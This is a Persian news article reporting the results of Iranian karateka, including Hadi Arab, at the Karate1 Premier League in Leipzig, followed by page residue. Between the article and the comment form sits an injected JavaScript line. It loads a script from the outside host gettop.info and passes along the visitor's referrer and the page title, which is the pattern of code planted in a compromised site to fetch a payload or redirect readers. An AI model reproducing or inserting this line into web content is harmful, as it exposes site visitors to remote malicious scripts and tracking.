هادی عرب قهرمان اروپا را برد اما پایش به سکو نرسید


هادی عرب کاراته

سه کاراته کای ایران در اوزان منها و به اضافه ۸۴ کیلوگرم از دور رقابت‌های لیگ جهانی کاراته وان آلمان کنار رفتند.

به‌ گزارش ‌سادس، در ادامه رقابت‌های لیگ جهانی کاراته وان که در شهر لایپزیک آلمان جریان دارد، در وزن منهای ۸۴ کیلوگرم، ذبیح الله پور شیب ابتدا فورخان اونوغلو از ترکیه را سه بر یک شکست داد. سپس دو بر صفر الکساندر مارکویچ از کرواسی مغلوب کرد. در سومین مبارزه پور شیب مقابل میگوئل آمارگاس از آرژانتین قرار گرفت و پس از تساوی صفر بر صفر در وقت قانونی مبارزه، حریف آرژانتینی در هانتی برنده شد.

در همین وزن مهدی خدابخشی در اولین مبارزه چهار بر صفر از سد آنتون اسحاق از بلاروس گذشت. دومین دیدار خدابخشی مقابل الساندرو رلا از ایتالیا بود که موفق شد سه بر صفر بر این کاراته کا غلبه کند.

گوخان گونداز از ترکیه حریف بعدی خدابخشی بود که با نتیجه‌ چهار بر یک از این کاراته کا شکست خورد.

گوخان گونداز دارنده برنز جهان و نقره اروپا در سال ۲۰۱۴ از ترکیه است.

ذبیح اله پورشیب و مهدی خدابخشی در وزن منهای ۸۴ کیلوگرم بدلیل شکست کاراته کاهای آرژانتین و ترکیه از گردونه رقابتها کنار رفتند.

هادی عرب در وزن به اضافه ۸۴ کیلوگرم، امریت کاهولن از آلمان را سه بر صفر برد. در ادامه‌  سه بر یک هریس سکریجل از بوسنی را شکست داد.

عرب در مرحله سوم به مصاف آرخان گوگیتا، قهرمان جهان در سال ۲۰۱۴ از گرجستان رفت و دو بر صفر باخت و به جدول رپه شارژ رفت.

در این گروه عرب ابتدا نیلسون جاکوئت از فرانسه را دو بر صفر شکست داد. سپس مقابل سیمونه مارینو از ایتالیا دارنده عنوان قهرمانی اروپا در سال ۲۰۱۷ پس از تساوی صفر بر صفر با رای داوران برنده شد. در سومین مبارزه یک بر صفر مقابل مهدی فلالی از فرانسه یک بر صفر باخت و از دور رقابت‌ها کنار رفت و به مدال نرسید.

انتهای پیام

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

پست بعدی

فراخوان شرکت در دومین جشنواره مطبوعاتی انجمن صنفی خبرنگاران و روزنامه نگاران ایران

ی شهریور ۱۹ , ۱۳۹۶
به گزارش سادس به نقل از  پایگاه اطلاع رسانی انجمن صنفی خبرنگاران و روزنامه نگاران ایران،انجمن صنفی خبرنگاران و روزنامه نگاران ایران به منظور تعامل بیشتر انجمن با اعضا و در راستای ارتقای بازدهی و اثرگذاری تولیدات رسانه ای روزنامه نگاران و خبرنگاران و معرفی آثار برتر، دومین جشنواره مطبوعاتی […]